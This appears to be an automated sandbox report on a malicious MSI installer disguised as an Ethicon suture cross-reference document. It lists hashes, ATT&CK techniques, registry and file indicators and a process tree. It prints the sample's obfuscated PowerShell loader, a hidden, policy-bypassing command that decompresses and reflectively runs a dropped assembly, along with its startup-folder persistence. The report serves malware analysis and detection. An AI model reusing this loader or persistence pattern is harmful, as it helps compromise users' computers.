34c8bc7759f366119181b6a06308188ac15aa61e987c1777bb3a1dacbd6e5024

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
24-12-2024 00:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Look-Suture-Cross-Reference-Ethicon.msi
Size

101.7MB
MD5

d32bff7790a7a7cc09e3fd8a604e4462
SHA1

8097f23668557b2dcdf6d3aca285c0d499b5c78f
SHA256

3303926a6468dab25286a65bb9f3e5883a8938e6501031b3b85e21f182d1ed0d
SHA512

cc5f0ff6e7121970c98efe91dff8846c0216faab8daac0102ece6110cb05d2e4504edd2b191c1f0a571a503c4ea3c51add920b22db9696e70579d5d246a43ac0
SSDEEP

49152:cwxcLDe+cpl7+GgVVN7HgTrztiIpqtSZFmD:Pa/MpZGgTFZFmD

Score

7^/10

discovery execution persistence privilege_escalation

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\MICrosoft\WIndoWs\STARt meNU\pROgraMs\STArTUP\a666a8fda214cd9238e7fd9c62da9.lnk	powershell.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	3044	msiexec.exe
4	1716	msiexec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\f76d845.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f76d845.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE00E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE0CB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE1B7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE215.tmp	msiexec.exe
File created	C:\Windows\Installer\f76d846.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDFDE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE294.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDEA5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE01E.tmp	msiexec.exe
File created	C:\Windows\Installer\f76d848.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f76d846.ipi	msiexec.exe

Executes dropped EXE 1 IoCs

pid	Process
1252	pdfelement-pro_setup_full5239.exe

Loads dropped DLL 10 IoCs

pid	Process
1580	MsiExec.exe
1580	MsiExec.exe
2368	MsiExec.exe
2368	MsiExec.exe
2368	MsiExec.exe
2368	MsiExec.exe
2368	MsiExec.exe
2368	MsiExec.exe
2368	MsiExec.exe
1580	MsiExec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
952	powershell.exe

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
3044	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pdfelement-pro_setup_full5239.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	pdfelement-pro_setup_full5239.exe

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\hguznrjvst\shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\hguznrjvst\shell\open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\hguznrjvst\shell\open\command\ = "poweRsHeLl -WIndOwsTYlE hiDdeN -Ep BYPass -cOMMand \"[sYStem.RefLeCtIoN.AsSembly]::loaD({$a0aa7c41ff34f981c548499da1e4a=NEw-oBJECT syStEm.iO.MemorYSTREAm(, $aRgS[0]);$a42eb79b0134e6981a8104636b9ca=NeW-OBjECt sYSTEM.iO.mEmorYsTrEam;$ad54b764e9845ab4de9dea2a69505=nEW-oBJecT SyStem.iO.COMPReSsiON.GZIPStREAm $a0aa7c41ff34f981c548499da1e4a, ([iO.cOmpreSsiOn.COmprESSIoNMOdE]::dEcOmpReSs);$ad54b764e9845ab4de9dea2a69505.CoPytO($a42eb79b0134e6981a8104636b9ca);$ad54b764e9845ab4de9dea2a69505.cLosE();$a0aa7c41ff34f981c548499da1e4a.ClosE();retuRn $a42eb79b0134e6981a8104636b9ca.tOaRraY();}.iNvOke([SysTeM.io.FiLe]::readalLbYTes('C:\\Users\\Admin\\AppData\\Roaming\\AdOBE\\jSlHwMCUpbdPAq\\KNdZgExPiYVlHsC.JEmHzFMuXCklIhw')));[a0cb94b33de41cafdb3b130fc96f7.a1dc1fc073f4b6be3d290facb90f5]::a2197eb87d64aa8dada0c2f713e48()\""	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\.ztesokyjwimpufq	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\.ztesokyjwimpufq\ = "hguznrjvst"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\hguznrjvst\shell\open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\hguznrjvst	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1716	msiexec.exe
1716	msiexec.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3044	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3044	msiexec.exe
Token: SeRestorePrivilege	1716	msiexec.exe
Token: SeTakeOwnershipPrivilege	1716	msiexec.exe
Token: SeSecurityPrivilege	1716	msiexec.exe
Token: SeCreateTokenPrivilege	3044	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3044	msiexec.exe
Token: SeLockMemoryPrivilege	3044	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3044	msiexec.exe
Token: SeMachineAccountPrivilege	3044	msiexec.exe
Token: SeTcbPrivilege	3044	msiexec.exe
Token: SeSecurityPrivilege	3044	msiexec.exe
Token: SeTakeOwnershipPrivilege	3044	msiexec.exe
Token: SeLoadDriverPrivilege	3044	msiexec.exe
Token: SeSystemProfilePrivilege	3044	msiexec.exe
Token: SeSystemtimePrivilege	3044	msiexec.exe
Token: SeProfSingleProcessPrivilege	3044	msiexec.exe
Token: SeIncBasePriorityPrivilege	3044	msiexec.exe
Token: SeCreatePagefilePrivilege	3044	msiexec.exe
Token: SeCreatePermanentPrivilege	3044	msiexec.exe
Token: SeBackupPrivilege	3044	msiexec.exe
Token: SeRestorePrivilege	3044	msiexec.exe
Token: SeShutdownPrivilege	3044	msiexec.exe
Token: SeDebugPrivilege	3044	msiexec.exe
Token: SeAuditPrivilege	3044	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3044	msiexec.exe
Token: SeChangeNotifyPrivilege	3044	msiexec.exe
Token: SeRemoteShutdownPrivilege	3044	msiexec.exe
Token: SeUndockPrivilege	3044	msiexec.exe
Token: SeSyncAgentPrivilege	3044	msiexec.exe
Token: SeEnableDelegationPrivilege	3044	msiexec.exe
Token: SeManageVolumePrivilege	3044	msiexec.exe
Token: SeImpersonatePrivilege	3044	msiexec.exe
Token: SeCreateGlobalPrivilege	3044	msiexec.exe
Token: SeCreateTokenPrivilege	3044	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3044	msiexec.exe
Token: SeLockMemoryPrivilege	3044	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3044	msiexec.exe
Token: SeMachineAccountPrivilege	3044	msiexec.exe
Token: SeTcbPrivilege	3044	msiexec.exe
Token: SeSecurityPrivilege	3044	msiexec.exe
Token: SeTakeOwnershipPrivilege	3044	msiexec.exe
Token: SeLoadDriverPrivilege	3044	msiexec.exe
Token: SeSystemProfilePrivilege	3044	msiexec.exe
Token: SeSystemtimePrivilege	3044	msiexec.exe
Token: SeProfSingleProcessPrivilege	3044	msiexec.exe
Token: SeIncBasePriorityPrivilege	3044	msiexec.exe
Token: SeCreatePagefilePrivilege	3044	msiexec.exe
Token: SeCreatePermanentPrivilege	3044	msiexec.exe
Token: SeBackupPrivilege	3044	msiexec.exe
Token: SeRestorePrivilege	3044	msiexec.exe
Token: SeShutdownPrivilege	3044	msiexec.exe
Token: SeDebugPrivilege	3044	msiexec.exe
Token: SeAuditPrivilege	3044	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3044	msiexec.exe
Token: SeChangeNotifyPrivilege	3044	msiexec.exe
Token: SeRemoteShutdownPrivilege	3044	msiexec.exe
Token: SeUndockPrivilege	3044	msiexec.exe
Token: SeSyncAgentPrivilege	3044	msiexec.exe
Token: SeEnableDelegationPrivilege	3044	msiexec.exe
Token: SeManageVolumePrivilege	3044	msiexec.exe
Token: SeImpersonatePrivilege	3044	msiexec.exe
Token: SeCreateGlobalPrivilege	3044	msiexec.exe
Token: SeCreateTokenPrivilege	3044	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3044	msiexec.exe
3044	msiexec.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1252	pdfelement-pro_setup_full5239.exe
1252	pdfelement-pro_setup_full5239.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 1716 wrote to memory of 1580	1716	msiexec.exe	31
PID 1716 wrote to memory of 1580	1716	msiexec.exe	31
PID 1716 wrote to memory of 1580	1716	msiexec.exe	31
PID 1716 wrote to memory of 1580	1716	msiexec.exe	31
PID 1716 wrote to memory of 1580	1716	msiexec.exe	31
PID 1716 wrote to memory of 2264	1716	msiexec.exe	36
PID 1716 wrote to memory of 2264	1716	msiexec.exe	36
PID 1716 wrote to memory of 2264	1716	msiexec.exe	36
PID 1716 wrote to memory of 2264	1716	msiexec.exe	36
PID 1716 wrote to memory of 2264	1716	msiexec.exe	36
PID 1716 wrote to memory of 2264	1716	msiexec.exe	36
PID 1716 wrote to memory of 2264	1716	msiexec.exe	36
PID 1716 wrote to memory of 2368	1716	msiexec.exe	37
PID 1716 wrote to memory of 2368	1716	msiexec.exe	37
PID 1716 wrote to memory of 2368	1716	msiexec.exe	37
PID 1716 wrote to memory of 2368	1716	msiexec.exe	37
PID 1716 wrote to memory of 2368	1716	msiexec.exe	37
PID 2368 wrote to memory of 952	2368	MsiExec.exe	38
PID 2368 wrote to memory of 952	2368	MsiExec.exe	38
PID 2368 wrote to memory of 952	2368	MsiExec.exe	38
PID 2368 wrote to memory of 1252	2368	MsiExec.exe	40
PID 2368 wrote to memory of 1252	2368	MsiExec.exe	40
PID 2368 wrote to memory of 1252	2368	MsiExec.exe	40
PID 2368 wrote to memory of 1252	2368	MsiExec.exe	40
PID 2368 wrote to memory of 1252	2368	MsiExec.exe	40
PID 2368 wrote to memory of 1252	2368	MsiExec.exe	40
PID 2368 wrote to memory of 1252	2368	MsiExec.exe	40
PID 952 wrote to memory of 1640	952	powershell.exe	41
PID 952 wrote to memory of 1640	952	powershell.exe	41
PID 952 wrote to memory of 1640	952	powershell.exe	41
PID 1640 wrote to memory of 1948	1640	csc.exe	42
PID 1640 wrote to memory of 1948	1640	csc.exe	42
PID 1640 wrote to memory of 1948	1640	csc.exe	42

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Look-Suture-Cross-Reference-Ethicon.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3044

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1716
- C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding B63CA143244657B7FC86548FE1C7F591 C
  2⤵
  - Loads dropped DLL
  PID:1580
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 33DFFC6EC134D938C1123FC224D02AF4
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2264
- C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding DBB1D4CE2757BA1700B2AD5E9F00F381
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file "C:\Users\Admin\AppData\Roaming\p.ps1"
    3⤵
    - Drops startup file
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:952
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gmm_htut.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1640
    - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE80F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE7FE.tmp"
        5⤵
        
        PID:1948
- - C:\Users\Admin\AppData\Roaming\pdfelement-pro_setup_full5239.exe
    "C:\Users\Admin\AppData\Roaming\pdfelement-pro_setup_full5239.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1252

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2596

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "000000000000053C" "00000000000005D8"
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Installer Packages

T1546.016

Privilege Escalation

Event Triggered Execution

T1546

Installer Packages

T1546.016

Defense Evasion

Modify Registry

T1112

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f76d847.rbs

Filesize
857KB

MD5
fdf923539c6b345f0a69dda204e2e833

SHA1
36e25b3661df1c80d2c17c2b1322b278ccb14cf6

SHA256
f869ad227e275ead0d3d6cbeb8fc4e8791e69eb5bdb9f3bbb1468b4bf81e8ce6

SHA512
a99e7405f4c9daaf0d554b1947609881f2009831ea1055e58a316b35f45c6ac5161abbbbd50279b47994db880a67df943027af088115a83748f77bb100981237

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f66502c22c9a4985a896990fa973e97f

SHA1
57ab81b63bf75737e7be41aa80afc095a8de9034

SHA256
1e9dde856c918198477e656577f6bd12b6f53f4fb1ecac73404f384c34e639b0

SHA512
85b2c92933b1a67516c0799b231ac4fb59bdf0770916f0000b6ad873dc443ef693227284ddc8d5f57f59aff94bbd9431f23250738cc9c37feb5433426ca64e50

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabBA8B.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE80F.tmp

Filesize
1KB

MD5
854b9890e6776ae34c72dd21575356d2

SHA1
279a1e29f1ec8b37b5abf6ff38c4b6462631ec45

SHA256
1d2c619b0579e39d5894c4bd00d840f4daddff3190b59b9f3dfa53b09a83832a

SHA512
656e79a57ff3ed7f3158741aabd44b3e0c3ed40741b69fec673b86afb4d56ab0012ca5f989737c092aba763f02c5c6c87cacee44a1deaa79e4d598e920ac1474

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarBA8E.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\d5c89e91-9857-472a-a395-049237d61468\Repository.ini

Filesize
76B

MD5
0ebe1358872422888226690a7ce70c7c

SHA1
49c827c1c49d0f2b7cb32cdd8cf670b8a5dffb03

SHA256
833335e26bd3625540f3fa393a5e824999ec892b3327916f78fb9b3b677bcc03

SHA512
7cfcc55994024ba4607132a264790f82ccb3bd3f1b968949968e6bbf1cdfae7ad49eb1cb667e8a2f92afbad30590084e04277933586a6e0ee7bb4938bd517479

Download Submit
C:\Users\Admin\AppData\Local\Temp\d5c89e91-9857-472a-a395-049237d61468\Repository.ini

Filesize
190B

MD5
4751a373ff31630898fd4e621954e5f2

SHA1
f4090f055e6a706c099f8e84bc1319b455b35f93

SHA256
d73d59cb8997490af4c036dddef09a3229415115caaa32d802bdc47d795f146d

SHA512
9997b79539e3a6817ae67904120e3c42f502876132320d4b41f42ae703de29db7a8a45132d549d372a208a71d3d120f4da27399398af91f9e1aa626dce091ba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\gmm_htut.dll

Filesize
3KB

MD5
4ab8e570f325f3f498c62294d35604ab

SHA1
ea97808bbdcf3081ae0ebe2a283a2dbd30898afa

SHA256
41763a14742fc1b79c35a8a6b68819474776f5230f9be8aa605a2704b93e7939

SHA512
16c32874e291b58e98399bf2c48a462e1ce905285f9a08642e89083063556bd6ba08d25a7df30e7d674bda326bc2105cef16d026afe98e0578c07d41d5b57c05

Download Submit
C:\Users\Admin\AppData\Local\Temp\gmm_htut.pdb

Filesize
7KB

MD5
086c2cc9dd935745467ab49d8529e8de

SHA1
936b216954ea77002e21d7aab489b77457d5ade3

SHA256
15600116496d2d71f3d5b54c744c12dc6aa58f667b713de677f341506e3a0970

SHA512
a0050487fc9a0ca9663d6fdfb75b65f2e39052bc966fdd0f85939f4247a8f8a186c8123fe6868c83cde9f5687c6a9751c18dff7279d962620d3f0270b7c72318

Download Submit
C:\Users\Admin\AppData\Local\Temp\wsWAE.log

Filesize
1KB

MD5
729e70cb7862a505c30239125aa17e4a

SHA1
f510b4f18c8a5946cdb0f003d894928e47dfd6f2

SHA256
e495b9911dcec8643f87afe401b464b0762d52a3097b4d27a4cb6056206fe003

SHA512
ac7d1846d44364e2eb41e3ebbfb3cac23cb2b8c7d7be256d86aa88c6b203e77e8de990690a4ec4812b9449530773d0f6e8b464be201c8549d613a9053eb33ce3

Download Submit
C:\Users\Admin\AppData\Local\Temp\wsWAE.log

Filesize
1KB

MD5
469c4ea343dec3e18824e44dadd6442c

SHA1
fa20c74a6390835b5710bf0c9217e440d9836655

SHA256
09ce3a0759d70e486acbc2a51d28a745f5fa50a1ae3748e4fccb845313be7d5b

SHA512
22d989745a63ff8b9873530fb2145c00ec7075e24b8d8e779f9b3a3c2ecff0f3d7523137a93ad55ff1fa9af99317057a48a7f476a3ac46188dcf459e81f742c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\wsWAE.log

Filesize
661B

MD5
5945b49c9cdb1ce23ec9d74361b1cf9d

SHA1
e0294c36aeea93f2531034059019d135cd0de12a

SHA256
5e7bf59cf4468c88a0e50a42be392ce3292f668cfec7216de26ac1d00cdf4a19

SHA512
a4730fbc7cc158911d5618b90ea8281ae0878ac3e282c3df8ff00b67f66573442b2b1d9e8622da40640e31e4bd444f4b5eb6f020ea83d20ac3c123dd28fd8a92

Download Submit
